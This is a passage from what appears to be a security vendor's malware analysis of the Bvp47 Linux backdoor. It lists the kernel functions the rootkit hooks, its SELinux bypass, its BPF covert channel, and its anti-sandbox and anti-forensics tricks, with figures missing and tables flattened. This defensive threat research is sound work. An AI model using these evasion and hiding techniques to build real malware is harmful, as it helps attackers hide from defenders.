|---|---|---|---| ----- ----- ###### Exploit the victim host as a jump server to attack target There was a network traffic evidence indicated that attacker would exploit the victim host as a jump server or C2 to attack target, namely, 210.135.90.0/24 in Japan played a C2 server in 2015. ----- ##### 6. Detailed Techniques of Bvp47 Backdoor The implementation of Bvp47 includes complex code, segment encryption and decryption, Linux multi-version platform adaptation, rich rootkit anti-tracking techniques, and most importantly, it integrates advanced BPF engine used in advanced covert channels, as well as cumbersome communication encryption and decryption process. This chapter will analyze the above aspects. ###### Main Behaviors There are several key points in the program initialization as follows: 1. Linux user mode and kernel mode. The process in user mode will remain alive 2. Initialize the Bvp engine 3. A series of environmental tests. If environmental information do not meet requirements, sample will be automatically deleted. 4. A series of payload block decryption 5. Tamper with kernel devmem restrictions. This will allow process in user mode to directly read and write kernel space. And other kernel techniques are used as well. 6. Load non-standard lkm module files 7. Hook system function in order to hide its own process, file, network, and self-deleting detection in the covered channel communication as follows: a . After Bvp47 receives the SYN packet sent by the server, it will match the packet format in BPF filter rules (see below) b . Only after satisfying the BPF rules in operation 1, encryption algorithms such as RSA+RC-X will be decrypted; c . Perform corresponding command operations according to the decrypted instructions; ----- ###### Payload The entire file of Bvp47 adopts the commonly used backdoor packaging method, that is, the backdoor function modules are compressed and assembled and then placed at the end of the file, and the whole file exists in the form of additional data. The additional data is loaded through the loader function module built into the program, which mainly completes the following steps: ###### Read Check Unzip Decryption Load The main data structure of payload is as follows: The specific content corresponding to the sample is as follows: ----- ----- 1. Call four different decryption functions (the underlying decryption method is the same) to complete the decompression operation of each slice; 2. After completing operation 1, the loader will continue to call the Xor 0x47 algorithm (see other chapters) to complete the decryption of slice. The specific decryption functions are as follows: ----- ###### Strings Encryption In the Bvp47 sample, many strings and blocks are encrypted to lower the possibility of exposure. These encryption techniques are mainly based on XOR operation. These subtle encryptions will cause considerable analysis costs to the researchers. According to the analysis, there are mainly 8 kinds of XOR operations: The algorithm of 0xa8a16d65_xor is as follows: ----- ###### Techniques of Function Name Obfuscation The export functions of some code slice modules in Bvp47's payload generally use the form of "digital names" to provide interface services to external. Such confusion creates a big obstacle for researchers in analyzing the function analysis of the export interface: ----- ###### Bvp Engine To improve its versatility, Bvp47 uses many dynamic calculations of Linux kernel data and function addresses. At the same time, to be fundamentally compatible with a large amount of Linux kernel data and various independently developed sections of the payload, they developed the Bvp engine to dynamically redirect and adapt the system functions and data structures required by Bvp47 in compilation and runtime. The Bvp engine adapts many functions and data structures: ----- ----- ----- Parsed result of the Bvp engine format in 0x0b: The MD5 value calculation method in the above figure is to read the content of /proc/version, and directly calculate the MD5 value as the unique identifier of the operating system kernel. Different versions of the kernel will correspond to the corresponding MD5 and structure values. To verify the accuracy of the MD5 value, a series of kernel versions are collected as follows: ----- ----- values marked with the digital version number in the upper half of the figure can be found in Bvp47, and they are all affected system versions): ###### System Hook Bvp47 mainly hooks nearly 70 process functions in the Linux operating system kernel, which are mainly used to hide network, process, file, and SeLinux bypass, etc. More details are as follows: |Hooked Function devmem_is_allowed page_is_ram sys_swapon si_swapinfo do_fork release_task dev_ioctl d_alloc vfs_readdir sys_unlink sys_rmdir vfs_getattr vfs_getattr64 tcp4_seq_show listening_get_next established_get_next udp4_seq_show raw_seq_show|Hook Location Middle of Function Middle of Function Start of Function Start of Function Middle of Function Start of Function Start of Function Start of Function Start of Function Middle of Function Middle of Function Start of Function Start of Function Start of Function Start of Function Start of Function Start of Function Start of Function|Hook Technique inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook| |---|---|---| ----- packet_seq_show Start of Function inline hook unix_seq_show Start of Function inline hook Selinux_xxx_ Start of Function inline hook get_raw_sock Start of Function inline hook get_raw_sock Start of Function inline hook sock_init_data Start of Function inline hook tcp_time_wait Middle of Function inline hook unix_accept Start of Function inline hook read_mem Start of Function inline hook __inode_dir_notify Start of Function inline hook avc_has_perm Middle of Function inline hook do_mount Start of Function inline hook sys_umount Start of Function inline hook do_acct_process Start of Function inline hook proc_root_lookup Start of Function inline hook proc_pid_readdir Start of Function inline hook kill_something_info Middle of Function inline hook sys_kill Start of Function inline hook sys_rt_sigqueueinfo Start of Function inline hook sys_tkill Start of Function inline hook sys_tgkill Start of Function inline hook sys_getpriority Start of Function inline hook sys_setpriority Start of Function inline hook sys_getpgid Start of Function inline hook sys_getsid Start of Function inline hook sys_capget Start of Function inline hook setscheduler Start of Function inline hook sys_sched_getscheduler Middle of Function inline hook sys_sched_getparam Middle of Function inline hook sched_getaffinity Middle of Function inline hook sched_setaffinity Middle of Function inline hook ----- sys_sched_rr_get_interval Middle of Function inline hook sys_ptrace sys_wait4 sys_waitid do_execve sys_close sys_open sys_read sys_write sys_dup sys_dup2 sys_accept sys_bind sys_connect sys_sendto sys_sendmsg sys_recvfrom sys_recvmsg Start of Function Start of Function Start of Function Start of Function Start of Function Start of Function Start of Function Start of Function Start of Function Start of Function Start of Function Start of Function Start of Function Middle of Function Middle of Function Middle of Function Middle of Function inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook inline hook Example 1: Comparison of the hook of the __d_lookup function: ----- hooking procedure is also to verify if upper layer application access /usr/bin/modload file. First part of the handle function is as follows: In the handler function, a lot of techniques of instant function search are used: ----- After hooking devmem_is_allowed, Bvp47 can read and write the kernel space in user mode. ----- By leveraging internal inline hook to avc_has_perm, Bvp47 can bypass SeLinux for any operations without limitation. ----- Bvp47 will filter read operations in sys_read. ----- ###### AV Evasion in Kernel Module Bvp47 will modify the first four bytes of the elf file of the kernel module to avoid memory search for elf and load it through its own lkm loader. ###### BPF Covert Channel BPF (Berkeley Packet Filter) is a kernel engine used in the Linux kernel to filter custom format packets. It can provide a set of prescribed languages for ordinary process in user layer to filter the specified data packets. Bvp47 directly uses this feature of BPF as an advanced technique at the Linux kernel level in the covert channel to avoid direct kernel network protocol stack hooks from being detected by researchers. The specific BPF usage are as follows. Only SYN packets (including UDP packets) that meet the rules will be sent to the next step for encryption and decryption: ----- ----- packet is 0x88 bytes. The structure of the Trigger Packege field is shown in the figure: Field structure diagram: ###### The red part: the data length is 0x0088 XOR 0xE6CF; The green part: the actual length of the decrypted data; The dark blue part: purple Random and 0x9D6A XOR; ----- ###### Channel Encryption and Decryption Bvp47 uses asymmetric algorithms RSA and the RC-X algorithm as a guarantee for the security of the communication link. Intermediate calculations will involve factors such as the time and length of sending and receiving packets. Some of the key pairs are as follows: ----- ----- ###### Runtime Environment Detection To better protect itself, Bvp47 has made a series of operating environment tests to prevent security researchers from directly performing dynamic analysis after the sample is obtained. After decrypting the first block of the payload, a 32-bit unsigned integer value will be obtained. This value is mainly used as a checksum to verify the operating environment. The specific verification method is as follows: 1. Loader executes statvsf("/", &stats); 2. Get operation 1 blocks and files in the execution result; 3. Compare the results of blocks ^ files == checksum ?. If they are equal, it is judged that the current environment meet requirements of running; ----- ###### Other Techniques 1. Use setrlimit api to set the core dump file size to 0 to prevent sample extraction; 2. Anti-sandbox technology combined with argv[0] and lstat; Untrusted programs are often run by sandboxes and monitor behavior. When the program is running, it often does not really land, that is to say, the path pointed to by argv[0] at this time is not the real path of the program. The program calls lstat through syscall to bypass the Hook of SandboxRing3 and check whether the file pointed to by argv[0] really exists. ###### 3. mkstmp anti-sandbox technology API used to generate temporary files in the Linux /tmp directory when mkstmp. (from our assumption: because the sandbox did not provide support for this API at the time, or the sandbox policy disabled mkstmp. Therefore, the success of the mkstmp call can be used to identify the sandbox). ###### 4. /boot anti-sandbox technology There are often only two directories in the /boot directory in the sandbox: /boot/. and /boot/... So if you open the /boot directory to count the number of files in the /boot directory, you can often identify the sandbox. (On Windows, the number of temporary files in the TEMP directory will be passed). ###### 5. API Flooding and Delayed Execution Any sandbox will only allocate a limited amount of time to each sample. Therefore, many legitimate APIs are called to delay execution to avoid the initiation analysis of the sandbox. ----- #### 7. Summary As an advanced attack tool, Bvp47 has allowed the world to see its complexity, pertinence and forward-looking. What is shocking is that after analysis, it has been realized that it may have existed for more than ten years. According to the information learned through Shadow Brokers Leaks and NSA ANT catalog channels, the engineering behind it basically involves the full *nix platform, and the advanced SYNKnock covert channel technology it uses may involve the Cisco platform, Solaris, AIX, SUN and even the Windows platform. What kind of force is driving its development? It may be possible to get some answers from multiple victim units, which generally come from key departments of the state. Pangu Lab as a cyber security team that insists on high-precision technology-driven, we soberly aware of the powerful ability of the world's super-class APT group in attacking technology. We could only protect users in future cyber confrontations by actively exploring of the cutting-edge technology of information security attack and defense, keeping tracking important incidents, and coordinating with cybersecurity professionals globally. ----- ### 8. References ###### 1. The Shadow Brokers: don’t forget your base https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 2. The Shadow Brokers: x0rz-EQGRP https://github.com/x0rz/EQGRP/ 3. NSA ANT catalog – Wikipedia https://en.wikipedia.org/wiki/NSA_ANT_catalog 4. FOXACID-Server-SOP-Redacted.pdf https://edwardsnowden.com/docs/doc/FOXACID-Server-SOP-Redacted.pdf ----- ### About Pangu Lab Beijing Qi an Pangu Laboratory Technology Co., Ltd. was established on the basis of Pangu laboratory, a well-known cyber security team. It focuses on advanced security research and attack and defense research, and has a deep research ability and experience in operating system, virtualization, Internet of things and application security research. -----